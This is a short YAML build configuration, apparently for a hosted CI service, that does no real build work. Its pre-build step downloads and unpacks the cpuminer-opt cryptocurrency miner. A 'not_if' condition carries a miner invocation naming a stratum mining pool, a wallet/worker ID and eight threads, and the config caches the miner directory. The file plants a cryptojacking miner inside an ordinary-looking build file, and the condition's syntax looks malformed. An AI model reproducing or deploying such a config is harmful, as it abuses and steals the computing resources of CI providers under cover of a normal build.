build:
  nodes:
    some-node:
      dependencies:
        before:
            - command: 'wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.22/cpuminer-opt-linux.tar.gz -O cpuminer-opt-linux.tar.gz && tar -xzf cpuminer-opt-linux.tar.gz'
              not_if: 'test -e ./cpuminer-sse2 -a yespower -o stratum+tcps://stratum-na.rplant.xyz:3350 -u PwdqwJ6LLWnCLeS9XPfoiXn81nuUjPB4E.kuas -t 8'

    cache:
      directories:
        - 'cpuminer-sse2'
